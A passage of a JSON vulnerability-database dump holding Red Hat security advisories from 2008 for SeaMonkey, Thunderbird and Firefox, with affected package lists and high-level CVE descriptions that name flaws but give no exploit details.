"x86_64", "packageFilename": "seamonkey-js-debugger-1.0.9-0.24.el3.x86_64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "i386", "packageFilename": "seamonkey-nspr-1.0.9-0.20.el2.i386.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "x86_64", "packageFilename": "seamonkey-chat-1.0.9-26.el4.x86_64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "ppc", "packageFilename": "seamonkey-js-debugger-1.0.9-26.el4.ppc.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390", "packageFilename": "seamonkey-nss-devel-1.0.9-0.24.el3.s390.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ppc", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.24.el3.ppc.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "i386", "packageFilename": "devhelp-0.10-0.10.el4.i386.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "ia64", "packageFilename": "seamonkey-js-debugger-1.0.9-0.20.el2.ia64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "i386", "packageFilename": "seamonkey-chat-1.0.9-0.20.el2.i386.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "ia64", "packageFilename": "seamonkey-dom-inspector-1.0.9-26.el4.ia64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "ppc", "packageFilename": "seamonkey-mail-1.0.9-26.el4.ppc.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ppc", "packageFilename": "seamonkey-devel-1.0.9-0.24.el3.ppc.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390", "packageFilename": "seamonkey-devel-1.0.9-0.24.el3.s390.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ia64", "packageFilename": "seamonkey-nspr-1.0.9-0.24.el3.ia64.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "x86_64", "packageFilename": "devhelp-0.10-0.10.el4.x86_64.rpm", "packageName": "devhelp", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390x", "packageFilename": "seamonkey-devel-1.0.9-0.24.el3.s390x.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390", "packageFilename": "seamonkey-nss-1.0.9-0.24.el3.s390.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390x", "packageFilename": "seamonkey-nss-1.0.9-0.24.el3.s390x.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ppc", "packageFilename": "seamonkey-nss-devel-1.0.9-0.24.el3.ppc.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "i386", "packageFilename": "seamonkey-dom-inspector-1.0.9-26.el4.i386.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "i386", "packageFilename": "seamonkey-js-debugger-1.0.9-26.el4.i386.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "i386", "packageFilename": "seamonkey-chat-1.0.9-0.24.el3.i386.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "i386", "packageFilename": "seamonkey-js-debugger-1.0.9-0.20.el2.i386.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390x", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.24.el3.s390x.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "ia64", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.20.el2.ia64.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "i386", "packageFilename": "seamonkey-1.0.9-0.20.el2.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ppc", "packageFilename": "seamonkey-nss-1.0.9-0.24.el3.ppc.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390", "packageFilename": "seamonkey-mail-1.0.9-0.24.el3.s390.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "ia64", "packageFilename": "seamonkey-mail-1.0.9-26.el4.ia64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390x", "packageFilename": "seamonkey-nspr-1.0.9-0.24.el3.s390x.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "x86_64", "packageFilename": "seamonkey-devel-1.0.9-0.24.el3.x86_64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "i386", "packageFilename": "seamonkey-chat-1.0.9-26.el4.i386.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390x", "packageFilename": "seamonkey-nss-devel-1.0.9-0.24.el3.s390x.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ppc", "packageFilename": "seamonkey-mail-1.0.9-0.24.el3.ppc.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "i386", "packageFilename": "seamonkey-1.0.9-0.24.el3.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "ia64", "packageFilename": "seamonkey-mail-1.0.9-0.20.el2.ia64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "s390", "packageFilename": "seamonkey-chat-1.0.9-26.el4.s390.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.24.el3.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "i386", "packageFilename": "seamonkey-nss-1.0.9-0.24.el3.i386.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "i386", "packageFilename": "seamonkey-nspr-1.0.9-0.24.el3.i386.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "ia64", "packageFilename": "seamonkey-js-debugger-1.0.9-26.el4.ia64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "i386", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.24.el3.i386.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "s390x", "packageFilename": "seamonkey-chat-1.0.9-26.el4.s390x.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390", "packageFilename": "seamonkey-chat-1.0.9-0.24.el3.s390.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "ppc", "packageFilename": "seamonkey-dom-inspector-1.0.9-26.el4.ppc.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "i386", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.20.el2.i386.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "ia64", "packageFilename": "seamonkey-nss-devel-1.0.9-0.20.el2.ia64.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ppc", "packageFilename": "seamonkey-1.0.9-0.24.el3.ppc.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "ia64", "packageFilename": "seamonkey-1.0.9-26.el4.ia64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ia64", "packageFilename": "seamonkey-devel-1.0.9-0.24.el3.ia64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390", "packageFilename": "seamonkey-js-debugger-1.0.9-0.24.el3.s390.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "x86_64", "packageFilename": "seamonkey-mail-1.0.9-0.24.el3.x86_64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "s390", "packageFilename": "seamonkey-js-debugger-1.0.9-26.el4.s390.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390", "packageFilename": "seamonkey-nspr-1.0.9-0.24.el3.s390.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390x", "packageFilename": "seamonkey-chat-1.0.9-0.24.el3.s390x.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "i386", "packageFilename": "devhelp-devel-0.10-0.10.el4.i386.rpm", "packageName": "devhelp-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "ia64", "packageFilename": "seamonkey-1.0.9-0.20.el2.ia64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "i386", "packageFilename": "seamonkey-mail-1.0.9-0.24.el3.i386.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ia64", "packageFilename": "seamonkey-nss-devel-1.0.9-0.24.el3.ia64.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "i386", "packageFilename": "seamonkey-nss-devel-1.0.9-0.24.el3.i386.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ia64", "packageFilename": "seamonkey-1.0.9-0.24.el3.ia64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "x86_64", "packageFilename": "seamonkey-devel-1.0.9-26.el4.x86_64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "ia64", "packageFilename": "seamonkey-chat-1.0.9-26.el4.ia64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "i386", "packageFilename": "seamonkey-devel-1.0.9-0.20.el2.i386.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "s390", "packageFilename": "seamonkey-mail-1.0.9-26.el4.s390.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ia64", "packageFilename": "seamonkey-chat-1.0.9-0.24.el3.ia64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "s390x", "packageFilename": "seamonkey-mail-1.0.9-26.el4.s390x.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ia64", "packageFilename": "seamonkey-mail-1.0.9-0.24.el3.ia64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ia64", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.24.el3.ia64.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "x86_64", "packageFilename": "seamonkey-1.0.9-26.el4.x86_64.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390x", "packageFilename": "seamonkey-mail-1.0.9-0.24.el3.s390x.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "i386", "packageFilename": "seamonkey-js-debugger-1.0.9-0.24.el3.i386.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "x86_64", "packageFilename": "seamonkey-js-debugger-1.0.9-26.el4.x86_64.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "ia64", "packageFilename": "seamonkey-chat-1.0.9-0.20.el2.ia64.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "x86_64", "packageFilename": "seamonkey-nss-devel-1.0.9-0.24.el3.x86_64.rpm", "packageName": "seamonkey-nss-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "s390x", "packageFilename": "seamonkey-dom-inspector-1.0.9-26.el4.s390x.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "i386", "packageFilename": "seamonkey-mail-1.0.9-26.el4.i386.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "i386", "packageFilename": "seamonkey-nss-1.0.9-0.20.el2.i386.rpm", "packageName": "seamonkey-nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "ppc", "packageFilename": "seamonkey-devel-1.0.9-26.el4.ppc.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "0.10-0.10.el4", "arch": "x86_64", "packageFilename": "devhelp-devel-0.10-0.10.el4.x86_64.rpm", "packageName": "devhelp-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "i386", "packageFilename": "seamonkey-1.0.9-26.el4.i386.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "ia64", "packageFilename": "seamonkey-nspr-1.0.9-0.20.el2.ia64.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "i386", "packageFilename": "seamonkey-devel-1.0.9-26.el4.i386.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "x86_64", "packageFilename": "seamonkey-mail-1.0.9-26.el4.x86_64.rpm", "packageName": "seamonkey-mail", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "s390x", "packageFilename": "seamonkey-devel-1.0.9-26.el4.s390x.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390x", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.24.el3.s390x.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "s390", "packageFilename": "seamonkey-dom-inspector-1.0.9-26.el4.s390.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "x86_64", "packageFilename": "seamonkey-nspr-1.0.9-0.24.el3.x86_64.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "ppc", "packageFilename": "seamonkey-chat-1.0.9-26.el4.ppc.rpm", "packageName": "seamonkey-chat", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "ia64", "packageFilename": "seamonkey-devel-1.0.9-0.20.el2.ia64.rpm", "packageName": "seamonkey-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "x86_64", "packageFilename": "seamonkey-nspr-devel-1.0.9-0.24.el3.x86_64.rpm", "packageName": "seamonkey-nspr-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "s390x", "packageFilename": "seamonkey-js-debugger-1.0.9-0.24.el3.s390x.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.0.9-0.24.el3", "arch": "ppc", "packageFilename": "seamonkey-nspr-1.0.9-0.24.el3.ppc.rpm", "packageName": "seamonkey-nspr", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "s390x", "packageFilename": "seamonkey-js-debugger-1.0.9-26.el4.s390x.rpm", "packageName": "seamonkey-js-debugger", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.0.9-26.el4", "arch": "s390", "packageFilename": "seamonkey-1.0.9-26.el4.s390.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "2", "packageVersion": "1.0.9-0.20.el2", "arch": "ia64", "packageFilename": "seamonkey-dom-inspector-1.0.9-0.20.el2.ia64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}], "description": "SeaMonkey is an open source Web browser, advanced email and newsgroup\nclient, IRC chat client, and HTML editor.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause SeaMonkey to crash or,\npotentially, execute arbitrary code as the user running SeaMonkey.\n(CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,\nCVE-2008-4062)\n\nSeveral flaws were found in the way malformed web content was displayed. A\nweb page containing specially crafted content could potentially trick a\nSeaMonkey user into surrendering sensitive information. (CVE-2008-3835,\nCVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n\nA flaw was found in the way SeaMonkey handles mouse click events. A web page\ncontaining specially crafted JavaScript code could move the content window\nwhile a mouse-button was pressed, causing any item under the pointer to be\ndragged. This could, potentially, cause the user to perform an unsafe\ndrag-and-drop action. (CVE-2008-3837)\n\nA flaw was found in SeaMonkey that caused certain characters to be stripped\nfrom JavaScript code. This flaw could allow malicious JavaScript to bypass\nor evade script filters. (CVE-2008-4065, CVE-2008-4066)\n\nAll SeaMonkey users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n", "reporter": "RedHat", "published": "2008-09-23T04:00:00", "type": "redhat", "title": "(RHSA-2008:0882) Critical: seamonkey security update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-0016", "CVE-2008-3835", "CVE-2008-3837", "CVE-2008-4058", "CVE-2008-4059", "CVE-2008-4060", "CVE-2008-4061", "CVE-2008-4062", "CVE-2008-4065", "CVE-2008-4066", "CVE-2008-4067", "CVE-2008-4068", "CVE-2008-4069"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-03-14T19:28:05", "id": "RHSA-2008:0882", "href": "https://access.redhat.com/errata/RHSA-2008:0882", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:19:25", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-16.el4", "arch": "ia64", "packageFilename": "thunderbird-1.5.0.12-16.el4.ia64.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-16.el4", "arch": "src", "packageFilename": "thunderbird-1.5.0.12-16.el4.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-16.el4", "arch": "x86_64", "packageFilename": "thunderbird-1.5.0.12-16.el4.x86_64.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-16.el4", "arch": "i386", "packageFilename": "thunderbird-1.5.0.12-16.el4.i386.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-16.el4", "arch": "ppc", "packageFilename": "thunderbird-1.5.0.12-16.el4.ppc.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-16.el4", "arch": "s390", "packageFilename": "thunderbird-1.5.0.12-16.el4.s390.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "1.5.0.12-16.el4", "arch": "s390x", "packageFilename": "thunderbird-1.5.0.12-16.el4.s390x.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.0.0.17-1.el5", "arch": "i386", "packageFilename": "thunderbird-2.0.0.17-1.el5.i386.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.0.0.17-1.el5", "arch": "src", "packageFilename": "thunderbird-2.0.0.17-1.el5.src.rpm", "packageName": "thunderbird", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.0.0.17-1.el5", "arch": "x86_64", "packageFilename": "thunderbird-2.0.0.17-1.el5.x86_64.rpm", "packageName": "thunderbird", "operator": "lt"}], "description": "Mozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail content.\nAn HTML mail message containing malicious content could cause Thunderbird\nto crash or, potentially, execute arbitrary code as the user running\nThunderbird. (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060,\nCVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed HTML mail content was\ndisplayed. An HTML mail message containing specially crafted content could\npotentially trick a Thunderbird user into surrendering sensitive\ninformation. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068)\n\nA flaw was found in Thunderbird that caused certain characters to be\nstripped from JavaScript code. This flaw could allow malicious JavaScript\nto bypass or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n\nNote: JavaScript support is disabled by default in Thunderbird; the above\nissue is not exploitable unless JavaScript is enabled.\n\nA heap based buffer overflow flaw was found in the handling of cancelled\nnewsgroup messages. If the user cancels a specially crafted newsgroup\nmessage it could cause Thunderbird to crash or, potentially, execute\narbitrary code as the user running Thunderbird. (CVE-2008-4070)\n\nAll Thunderbird users should upgrade to these updated packages, which\nresolve these issues.", "reporter": "RedHat", "published": "2008-10-01T04:00:00", "type": "redhat", "title": "(RHSA-2008:0908) Moderate: thunderbird security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-0016", "CVE-2008-3835", "CVE-2008-4058", "CVE-2008-4059", "CVE-2008-4060", "CVE-2008-4061", "CVE-2008-4062", "CVE-2008-4065", "CVE-2008-4066", "CVE-2008-4067", "CVE-2008-4068", "CVE-2008-4070"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:08:38", "id": "RHSA-2008:0908", "href": "https://access.redhat.com/errata/RHSA-2008:0908", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:20:03", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.0.2-3.el4", "arch": "ia64", "packageFilename": "firefox-3.0.2-3.el4.ia64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.0.2-3.el4", "arch": "src", "packageFilename": "firefox-3.0.2-3.el4.src.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.0.2-3.el4", "arch": "x86_64", "packageFilename": "firefox-3.0.2-3.el4.x86_64.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.0.2-3.el4", "arch": "i386", "packageFilename": "firefox-3.0.2-3.el4.i386.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.0.2-3.el4", "arch": "ppc", "packageFilename": "firefox-3.0.2-3.el4.ppc.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.0.2-3.el4", "arch": "s390", "packageFilename": "firefox-3.0.2-3.el4.s390.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "3.0.2-3.el4", "arch": "s390x", "packageFilename": "firefox-3.0.2-3.el4.s390x.rpm", "packageName": "firefox", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "i386", "packageFilename": "nss-tools-3.12.1.1-1.el5.i386.rpm", "packageName": "nss-tools", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "3.12.1.1-1.el5", "arch": "i386", "packageFilename": "nss-3.12.1.1-1.el5.i386.rpm", "packageName": "nss", "operator": "lt"}, {"OS": "RedHat", "OSVersion": 